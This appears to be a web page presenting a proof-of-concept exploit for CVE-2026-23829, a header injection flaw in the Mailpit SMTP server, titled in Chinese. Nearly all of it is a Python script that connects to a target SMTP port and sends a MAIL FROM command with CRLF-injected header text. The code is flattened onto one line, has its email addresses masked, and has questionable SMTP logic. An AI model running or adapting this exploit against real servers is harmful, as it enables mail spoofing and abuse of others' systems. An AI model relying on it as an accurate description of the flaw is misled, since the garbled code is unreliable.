CVE-2026-23829 Mailpit SMTP服务器邮件头注入漏洞

import socket import ssl def exploit_mailpit_header_injection(target_host, target_port=1025): """ PoC for CVE-2026-23829: Mailpit SMTP Header Injection This demonstrates how to inject arbitrary headers via RCPT TO or MAIL FROM """ # Create socket connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) # Receive greeting response = sock.recv(1024) print(f"[+] Server: {response.decode().strip()}") # Send EHLO sock.send(b"EHLO test.example.com\r\n") response = sock.recv(1024) print(f"[+] EHLO Response: {response.decode().strip()}") # Inject arbitrary header via MAIL FROM with CRLF injection # Inject X-Injected-Header: [email protected] malicious_from = "MAIL FROM:<[email protected]\r\nX-Injected-Header: [email protected]>\r\n" sock.send(malicious_from.encode()) response = sock.recv(1024) print(f"[+] MAIL FROM Response: {response.decode().strip()}") # Continue with normal RCPT TO sock.send(b"RCPT TO:<[email protected]>\r\n") response = sock.recv(1024) print(f"[+] RCPT TO Response: {response.decode().strip()}") # Send DATA command sock.send(b"DATA\r\n") response = sock.recv(1024) print(f"[+] DATA Response: {response.decode().strip()}") # Send email body email_body = "Subject: Test Email\r\n\r\nThis is a test email.\r\n." sock.send(email_body.encode()) response = sock.recv(1024) print(f"[+] Email Send Response: {response.decode().strip()}") # Quit sock.send(b"QUIT\r\n") sock.close() print("[+] Connection closed") if __name__ == "__main__": target = "mailpit-server.local" port = 1025 exploit_mailpit_header_injection(target, port)